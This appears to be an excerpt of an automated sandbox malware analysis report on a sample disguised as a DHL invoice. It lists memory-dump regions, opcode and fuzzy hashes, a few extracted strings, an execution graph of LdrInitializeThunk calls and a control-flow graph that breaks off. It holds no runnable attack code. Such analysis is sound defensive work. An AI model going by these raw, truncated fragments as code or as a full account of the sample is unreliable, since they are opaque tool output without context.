                                                                                                                • Opcode ID: ed2124e48ba0be370ab78b5968fd22a9bfacd3b634dcb785bafb63a7582dd3d0
                                                                                                                • Instruction ID: bcd865e060d710e4faa702f6416bb35e79faac7632f8dfdd7a158d04ef7ae30c
                                                                                                                • Opcode Fuzzy Hash: ed2124e48ba0be370ab78b5968fd22a9bfacd3b634dcb785bafb63a7582dd3d0
                                                                                                                • Instruction Fuzzy Hash: FAD10A34A04614CFCB14DF69C588A6AB7F2FF88310F25C8A9E5069B365DB35ED81CB61
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (bq
                                                                                                                • API String ID: 0-149360118
                                                                                                                • Opcode ID: a9ab11917f062acbf27d81adac581cc83d4918f83d0ae4e51fd4cc8866320c75
                                                                                                                • Instruction ID: 55f7a34120c3759592b119581da6b6d8f7b2f794154e00b8721f27e73e761d55
                                                                                                                • Opcode Fuzzy Hash: a9ab11917f062acbf27d81adac581cc83d4918f83d0ae4e51fd4cc8866320c75
                                                                                                                • Instruction Fuzzy Hash: 69325975B007198FCB58DF69C498A6EFBF2FB88300F24852AD55AD7381DB34A911CB85
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmp, Offset: 05290000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2049662868.00000000052E0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5290000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                                                                                • Instruction ID: af3a642094df821680657aed00c7c12f0b5e731503f59f92828385f5011d58aa
                                                                                                                • Opcode Fuzzy Hash: b8ef338a347d78b24a48a91f5c579d559d241ca399c22e27505efb135b2aab1a
                                                                                                                • Instruction Fuzzy Hash: E0C2CE6642E3C25FDB1B8B349DB6AE17FB1EE2321471E04DBD4C18F163E218594AC762
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: &
                                                                                                                • API String ID: 0-1010288
                                                                                                                • Opcode ID: bc1b38d21bfd368c05a8f52f73d6a5e1733be2c7566b7bc3d4ed405da7481abe
                                                                                                                • Instruction ID: e7c8b788ec923ecdd8d8b165bb4cbbe5e049cd57880ea58b549afa6ce7467699
                                                                                                                • Opcode Fuzzy Hash: bc1b38d21bfd368c05a8f52f73d6a5e1733be2c7566b7bc3d4ed405da7481abe
                                                                                                                • Instruction Fuzzy Hash: 4D415F71E05A588BEB18CF6B8C4069AFAF3BFC9201F14D5BA980DAA255EB3055819F05
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 6ccc6458f0d69c6a87c013457df1b349883bb11e9b7d6424edc71aa0bde14956
                                                                                                                • Instruction ID: 16fdc61c57c1856bfa70ca1e7907a7f2d933872bc074de1eb1fa93abe8007fb4
                                                                                                                • Opcode Fuzzy Hash: 6ccc6458f0d69c6a87c013457df1b349883bb11e9b7d6424edc71aa0bde14956
                                                                                                                • Instruction Fuzzy Hash: 2E12D470E046188FDB14CFAAC98069DFBF2FF89304F24C569D419AB21AD734A986CF54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0ae6d05c3505623bea438144b8ba7b62d648fe70d8bcf132b2cbaf447b27e7df
                                                                                                                • Instruction ID: 0c0a4edaceaa5bf15380c0de4b145f1db4f9a00cc43e42d5e21028ada4102124
                                                                                                                • Opcode Fuzzy Hash: 0ae6d05c3505623bea438144b8ba7b62d648fe70d8bcf132b2cbaf447b27e7df
                                                                                                                • Instruction Fuzzy Hash: CAD114B0E15358CFDB14EFA9D889B9DBBF6BF89300F1081A9D419AB295CB705985CF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dca486133d4dea025a4c44d52819311c34b3bde2de60285ef6cf5ceb0823fa12
                                                                                                                • Instruction ID: 800696263a92ef5119c7ed8afa2e1fae782e0d3597fba7f069f253b29ca88a01
                                                                                                                • Opcode Fuzzy Hash: dca486133d4dea025a4c44d52819311c34b3bde2de60285ef6cf5ceb0823fa12
                                                                                                                • Instruction Fuzzy Hash: CD910671E04208CFDB14DFA9D885BADBBFABF49300F50806AD419A73A5CB785984CF00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049662868.00000000052E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05290000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2049582466.0000000005290000.00000004.08000000.00040000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5290000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 896ceec31201d94d9487091013a1669200938fbf16fbe69a3f5c0fac05f6e357
                                                                                                                • Instruction ID: 5c0f03a8d8758c1319599d42d6c8c91daddb8c6ccdeb17818a3051ee42dbd340
                                                                                                                • Opcode Fuzzy Hash: 896ceec31201d94d9487091013a1669200938fbf16fbe69a3f5c0fac05f6e357
                                                                                                                • Instruction Fuzzy Hash: 3E912174A14208CFDB18DFA8D595BAEB7FAFF89300F50802AE41AA7395CB745946CF14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: f1af9b80427f6d668bb374ff51dc948cdb2ceba9ea35a3f2a943e76d181c7743
                                                                                                                • Instruction ID: ad1321fc593a37cac4449d1805c31d6a00047da5fe742fd11adcd0339328837b
                                                                                                                • Opcode Fuzzy Hash: f1af9b80427f6d668bb374ff51dc948cdb2ceba9ea35a3f2a943e76d181c7743
                                                                                                                • Instruction Fuzzy Hash: C591F471E05218CFDB14DFA9D885BADBBFABF49300F50806AD519A7395CB786985CF00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: eca967143b7e875c547f7ca42119c53b809d911c057694b6e0e9beffd387b5dd
                                                                                                                • Instruction ID: 41ffbf11f893851ecc2f15376e38c5e66eee08d57d2bdf23477dc274e879d915
                                                                                                                • Opcode Fuzzy Hash: eca967143b7e875c547f7ca42119c53b809d911c057694b6e0e9beffd387b5dd
                                                                                                                • Instruction Fuzzy Hash: 8A9120B0E25218CFEBA8EF65C8487DDBBF5BF49304F1088A9C809A7255DB715985CF41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 56765932c1b3425199a7819d775302cc580ffd7f18750e7bc45f09f351fb5fb0
                                                                                                                • Instruction ID: aa0c0aa297cec4f7cdcb3fa217cd9db163c3cfac701e54c76dc0b4da08736459
                                                                                                                • Opcode Fuzzy Hash: 56765932c1b3425199a7819d775302cc580ffd7f18750e7bc45f09f351fb5fb0
                                                                                                                • Instruction Fuzzy Hash: BE91E571E04208CFDB14DF69D885BADBBFABF49300F5080AAD519A7395CB78A985CF00
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e8a7f735f2cf43b9b39be9280671a51ad44f9ed7d913728ac81f726a9fdb58ee
                                                                                                                • Instruction ID: 17e1f7fa02d17fe54b793b830db61668e60ff0843bc82e1c68511b98b6c392ef
                                                                                                                • Opcode Fuzzy Hash: e8a7f735f2cf43b9b39be9280671a51ad44f9ed7d913728ac81f726a9fdb58ee
                                                                                                                • Instruction Fuzzy Hash: C381CFB0D1521CCBEB24CFA6C885BAEBBB6BF49344F1081AAC419A7251D7B45988CF14
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049494655.0000000005230000.00000040.00000800.00020000.00000000.sdmp, Offset: 05230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2367531bbe0ff612a4ec7003e4abe755505886fa80d69ece63768e841087790e
                                                                                                                • Instruction ID: cdf77e54e32ecf2872e9a7ecd1c8baa277074af7f28598e543fd71dbceea2a49
                                                                                                                • Opcode Fuzzy Hash: 2367531bbe0ff612a4ec7003e4abe755505886fa80d69ece63768e841087790e
                                                                                                                • Instruction Fuzzy Hash: 0671E3B0D1521CCBEB24CFA6C885BEDBBB6BF89340F1081AAC419B7251D7B45988CF50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1c59d8eb876691aa10c311e0c598e760b4fd89412c9967723f12f200f38cff73
                                                                                                                • Instruction ID: ed06e5f43896438a3d1a0d998449291382fc09a3d014b1216736467a162733ab
                                                                                                                • Opcode Fuzzy Hash: 1c59d8eb876691aa10c311e0c598e760b4fd89412c9967723f12f200f38cff73
                                                                                                                • Instruction Fuzzy Hash: D3510570E0620CCFDB14DFA8D948BEDBBF6FB49380F10902AD409A7295DB786945CB44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050844810.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5f70000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e3bc89a6d6b77940d497bbdd2bdb1e2861c54702c0bfe2fea3b9dd1c77054a08
                                                                                                                • Instruction ID: 9f4cd5a18213cdc76e17a93cd609483e301530341c7369f81ad24e901aae99f8
                                                                                                                • Opcode Fuzzy Hash: e3bc89a6d6b77940d497bbdd2bdb1e2861c54702c0bfe2fea3b9dd1c77054a08
                                                                                                                • Instruction Fuzzy Hash: FC511570E1620CCFDB14EFA8D988BEDBBF6FB49340F14902AE009A7295CB785945CB44
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 989a58dc4ec3ea9f03aebcbdd16c434583f13816c23454b0f5d185019d841a80
                                                                                                                • Instruction ID: 1353201ba56d603956f8cdd423e00c10d588d5c64f295d165b44a29750eb1b0a
                                                                                                                • Opcode Fuzzy Hash: 989a58dc4ec3ea9f03aebcbdd16c434583f13816c23454b0f5d185019d841a80
                                                                                                                • Instruction Fuzzy Hash: 2E416AB5E056198BDB18CFABD94069EFBF3BFC8300F14C17AD958AB214EB3059468B54
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2036075757.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a50000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ae0e1bae0d9d0914892b887cd3a7e3c98aa8442d332635a52a071f20eb750548
                                                                                                                • Instruction ID: bfff399972cc1375cc99f4d29b82a38208b61e68c4191ddf51ae11439e47d40a
                                                                                                                • Opcode Fuzzy Hash: ae0e1bae0d9d0914892b887cd3a7e3c98aa8442d332635a52a071f20eb750548
                                                                                                                • Instruction Fuzzy Hash: 73510371D056148BEB2CCF2B8D456CAFAF3AFC9301F14C1FA994CA6264DB740A858F45
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bb72bd385a4f707252084417b72fd033e7d9b06f45f6de82971016615fb274ee
                                                                                                                • Instruction ID: 01a3842fb05a76b1acd02bfe43f169c9de7823a2f2ea735f5a95087d1bba266b
                                                                                                                • Opcode Fuzzy Hash: bb72bd385a4f707252084417b72fd033e7d9b06f45f6de82971016615fb274ee
                                                                                                                • Instruction Fuzzy Hash: F44187B0D056298BEB68CF5ACC4879AFAF6BF89304F14C1A9C40DA6264DB740A85CF01
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ff2b882fbb2fef67ced560a51550923afc0a993e39a2d3382bc0d9d1e94ac34d
                                                                                                                • Instruction ID: 0d3a5b22b6985d80187c488c48f9ab7bfebcc12b53a30b7e41531c1e4145e6aa
                                                                                                                • Opcode Fuzzy Hash: ff2b882fbb2fef67ced560a51550923afc0a993e39a2d3382bc0d9d1e94ac34d
                                                                                                                • Instruction Fuzzy Hash: 6941D8B1D04618CBDB18CF6AC9456DDBBF6AB89301F14C0A9D40DAB314DB355E85CF40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 47c52a865a70d387b4f371aa2e0474c01adba995a15aa276d98f7e6badb97eea
                                                                                                                • Instruction ID: 1c68e1865396bb1af07b6948923ddfb50f6d8fc27cb68cd9f464c5f1d872d0c1
                                                                                                                • Opcode Fuzzy Hash: 47c52a865a70d387b4f371aa2e0474c01adba995a15aa276d98f7e6badb97eea
                                                                                                                • Instruction Fuzzy Hash: 3041FF70E05668CFEB28DF56C94879ABBF6BF89300F04C0EA990CA7254D7744A85CF11
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2049761516.0000000005390000.00000040.00000800.00020000.00000000.sdmp, Offset: 05390000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5390000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: faa3452cdd462843d18c9cb8918c54a1e7b1566ac47e863e7d9c1e418e900f70
                                                                                                                • Instruction ID: 74c0251abdfb80bca5345e9b74c96632026c33abb9853dab99ebd9ce30aed7c8
                                                                                                                • Opcode Fuzzy Hash: faa3452cdd462843d18c9cb8918c54a1e7b1566ac47e863e7d9c1e418e900f70
                                                                                                                • Instruction Fuzzy Hash: AC3187B1E016188BEB68CF5BCD4578EFAF7AFC9304F14C1A9D40CAA264DB740A468E41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050914473.0000000006230000.00000040.00000800.00020000.00000000.sdmp, Offset: 06230000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_6230000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 17d7022e236ea5b464a3787fbcaeb2cb09d2e6b3a13f8a38bf1a43a6d11cf398
                                                                                                                • Instruction ID: 54bc0b95011f8d9455bb5dc13d0f332b8c9697d7045893fb7118283034a9cafc
                                                                                                                • Opcode Fuzzy Hash: 17d7022e236ea5b464a3787fbcaeb2cb09d2e6b3a13f8a38bf1a43a6d11cf398
                                                                                                                • Instruction Fuzzy Hash: E721E171D056689BE72CCF5BC94939AFAF7BFC8300F14C0BA980CA6214D7744A858E00
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050337889.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c20000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
                                                                                                                • API String ID: 0-723292480
                                                                                                                • Opcode ID: 4dcce15858171e60ded6086b93f85918e326a5b41dd0fb2808546eb76c78642e
                                                                                                                • Instruction ID: bf3fdbbbdfc2ec21f8aa9b8388db66244bb13da04a1a4ba0b23185d233cab8e8
                                                                                                                • Opcode Fuzzy Hash: 4dcce15858171e60ded6086b93f85918e326a5b41dd0fb2808546eb76c78642e
                                                                                                                • Instruction Fuzzy Hash: F8516E31A402098FC758DB79C9507AFBBE7BFC8300F148928D4099B369DF75AD468BA1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2050306783.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_5c10000_Invoice DHL - AWB 2024 E4001 - 0000731.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $$9$M$|
                                                                                                                • API String ID: 0-1776002413
                                                                                                                • Opcode ID: 0c2aed4f138ac49c41de6753e41991aafb89b8738010ec24e3532638faf89210
                                                                                                                • Instruction ID: e2e861e3003142bfc98d12fc827618920d746217f17fb206d0c30fd1932ef43a
                                                                                                                • Opcode Fuzzy Hash: 0c2aed4f138ac49c41de6753e41991aafb89b8738010ec24e3532638faf89210
                                                                                                                • Instruction Fuzzy Hash: 1901E8B080926DCFDB20CF54D948BA9BBB2BB06305F1005E9D909A7241D7784AC4DF5A

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:17.8%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:6.5%
                                                                                                                Total number of Nodes:62
                                                                                                                Total number of Limit Nodes:7
                                                                                                                execution_graph 26836 9ccee8 26837 9ccef4 26836->26837 26847 5d911c0 26837->26847 26854 5d911b0 26837->26854 26838 9ccfa8 26861 5d9c648 26838->26861 26865 5d9c638 26838->26865 26839 9ccfcb 26869 5dc7900 26839->26869 26876 5dc7910 26839->26876 26840 9cd0c7 26848 5d911e2 26847->26848 26849 5d912ae 26848->26849 26883 5d97d90 26848->26883 26889 5d98174 26848->26889 26895 5d97b60 26848->26895 26901 5d97b70 26848->26901 26849->26838 26855 5d911e2 26854->26855 26856 5d912ae 26855->26856 26857 5d97d90 2 API calls 26855->26857 26858 5d97b70 LdrInitializeThunk 26855->26858 26859 5d97b60 2 API calls 26855->26859 26860 5d98174 2 API calls 26855->26860 26856->26838 26857->26856 26858->26856 26859->26856 26860->26856 26862 5d9c66a 26861->26862 26863 5d97d90 2 API calls 26862->26863 26864 5d9c734 26862->26864 26863->26864 26864->26839 26866 5d9c66a 26865->26866 26867 5d97d90 2 API calls 26866->26867 26868 5d9c734 26866->26868 26867->26868 26868->26839 26870 5dc7910 26869->26870 26871 5dc7a44 26870->26871 26872 5d97d90 2 API calls 26870->26872 26873 5d97b70 LdrInitializeThunk 26870->26873 26874 5d97b60 2 API calls 26870->26874 26875 5d98174 2 API calls 26870->26875 26871->26840 26872->26871 26873->26871 26874->26871 26875->26871 26877 5dc7932 26876->26877 26878 5dc7a44 26877->26878 26879 5d97d90 2 API calls 26877->26879 26880 5d97b70 LdrInitializeThunk 26877->26880 26881 5d97b60 2 API calls 26877->26881 26882 5d98174 2 API calls 26877->26882 26878->26840 26879->26878 26880->26878 26881->26878 26882->26878 26888 5d97dc1 26883->26888 26884 5d97f21 26884->26849 26885 5d9816c LdrInitializeThunk 26885->26884 26887 5d97b70 LdrInitializeThunk 26887->26888 26888->26884 26888->26885 26888->26887 26893 5d9802b 26889->26893 26890 5d9816c LdrInitializeThunk 26892 5d982c9 26890->26892 26892->26849 26893->26890 26894 5d97b70 LdrInitializeThunk 26893->26894 26894->26893 26896 5d97b82 26895->26896 26900 5d97b87 26895->26900 26896->26849 26897 5d9816c LdrInitializeThunk 26897->26896 26899 5d97b70 LdrInitializeThunk 26899->26900 26900->26896 26900->26897 26900->26899 26902 5d97b82 26901->26902 26904 5d97b87 26901->26904 26902->26849 26903 5d982b1 LdrInitializeThunk 26903->26902 26904->26902 26904->26903 26905 5d98460 26906 5d98467 26905->26906 26908 5d9846d 26905->26908 26907 5d97b70 LdrInitializeThunk 26906->26907 26906->26908 26910 5d987ee 26906->26910 26907->26910 26909 5d97b70 LdrInitializeThunk 26909->26910 26910->26908 26910->26909

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 146 9c6748-9c677e 147 9c6786-9c678c 146->147 276 9c6780 call 9c02dd 146->276 277 9c6780 call 9c6748 146->277 278 9c6780 call 9c6898 146->278 279 9c6780 call 9c6120 146->279 148 9c67dc-9c67e0 147->148 149 9c678e-9c6792 147->149 152 9c67f7-9c680b 148->152 153 9c67e2-9c67f1 148->153 150 9c6794-9c6799 149->150 151 9c67a1-9c67a8 149->151 150->151 154 9c687e-9c68bb 151->154 155 9c67ae-9c67b5 151->155 158 9c6813-9c681a 152->158 274 9c680d call 9c9868 152->274 275 9c680d call 9c9864 152->275 156 9c681d-9c6827 153->156 157 9c67f3-9c67f5 153->157 167 9c68bd-9c68c3 154->167 168 9c68c6-9c68e6 154->168 155->148 161 9c67b7-9c67bb 155->161 159 9c6829-9c682f 156->159 160 9c6831-9c6835 156->160 157->158 163 9c683d-9c6877 159->163 160->163 164 9c6837 160->164 165 9c67bd-9c67c2 161->165 166 9c67ca-9c67d1 161->166 163->154 164->163 165->166 166->154 169 9c67d7-9c67da 166->169 167->168 174 9c68ed-9c68f4 168->174 175 9c68e8 168->175 169->158 178 9c68f6-9c6901 174->178 177 9c6c7c-9c6c85 175->177 179 9c6c8d-9c6cc9 178->179 180 9c6907-9c691a 178->180 189 9c6ccb-9c6cd0 179->189 190 9c6cd2-9c6cd6 179->190 185 9c691c-9c692a 180->185 186 9c6930-9c694b 180->186 185->186 192 9c6c04-9c6c0b 185->192 194 9c694d-9c6953 186->194 195 9c696f-9c6972 186->195 193 9c6cdc-9c6cdd 189->193 190->193 192->177 198 9c6c0d-9c6c0f 192->198 196 9c695c-9c695f 194->196 197 9c6955 194->197 199 9c6acc-9c6ad2 195->199 200 9c6978-9c697b 195->200 202 9c6992-9c6998 196->202 203 9c6961-9c6964 196->203 197->196 197->199 201 9c6bbe-9c6bc1 197->201 197->202 204 9c6c1e-9c6c24 198->204 205 9c6c11-9c6c16 198->205 199->201 206 9c6ad8-9c6add 199->206 200->199 207 9c6981-9c6987 200->207 212 9c6c88 201->212 213 9c6bc7-9c6bcd 201->213 214 9c699e-9c69a0 202->214 215 9c699a-9c699c 202->215 208 9c69fe-9c6a04 203->208 209 9c696a 203->209 204->179 210 9c6c26-9c6c2b 204->210 205->204 206->201 207->199 211 9c698d 207->211 208->201 221 9c6a0a-9c6a10 208->221 209->201 219 9c6c2d-9c6c32 210->219 220 9c6c70-9c6c73 210->220 211->201 212->179 216 9c6bcf-9c6bd7 213->216 217 9c6bf2-9c6bf6 213->217 218 9c69aa-9c69b3 214->218 215->218 216->179 224 9c6bdd-9c6bec 216->224 217->192 227 9c6bf8-9c6bfe 217->227 225 9c69b5-9c69c0 218->225 226 9c69c6-9c69ee 218->226 219->212 229 9c6c34 219->229 220->212 228 9c6c75-9c6c7a 220->228 222 9c6a16-9c6a18 221->222 223 9c6a12-9c6a14 221->223 230 9c6a22-9c6a39 222->230 223->230 224->186 224->217 225->201 225->226 249 9c69f4-9c69f9 226->249 250 9c6ae2-9c6b18 226->250 227->178 227->192 228->177 228->198 231 9c6c3b-9c6c40 229->231 242 9c6a3b-9c6a54 230->242 243 9c6a64-9c6a8b 230->243 232 9c6c62-9c6c64 231->232 233 9c6c42-9c6c44 231->233 232->212 240 9c6c66-9c6c69 232->240 237 9c6c46-9c6c4b 233->237 238 9c6c53-9c6c59 233->238 237->238 238->179 241 9c6c5b-9c6c60 238->241 240->220 241->232 245 9c6c36-9c6c39 241->245 242->250 254 9c6a5a-9c6a5f 242->254 243->212 253 9c6a91-9c6a94 243->253 245->212 245->231 249->250 257 9c6b1a-9c6b1e 250->257 258 9c6b25-9c6b2d 250->258 253->212 256 9c6a9a-9c6ac3 253->256 254->250 256->250 273 9c6ac5-9c6aca 256->273 259 9c6b3d-9c6b41 257->259 260 9c6b20-9c6b23 257->260 258->212 261 9c6b33-9c6b38 258->261 262 9c6b60-9c6b64 259->262 263 9c6b43-9c6b49 259->263 260->258 260->259 261->201 266 9c6b6e-9c6b8d call 9c6e70 262->266 267 9c6b66-9c6b6c 262->267 263->262 265 9c6b4b-9c6b53 263->265 265->212 268 9c6b59-9c6b5e 265->268 270 9c6b93-9c6b97 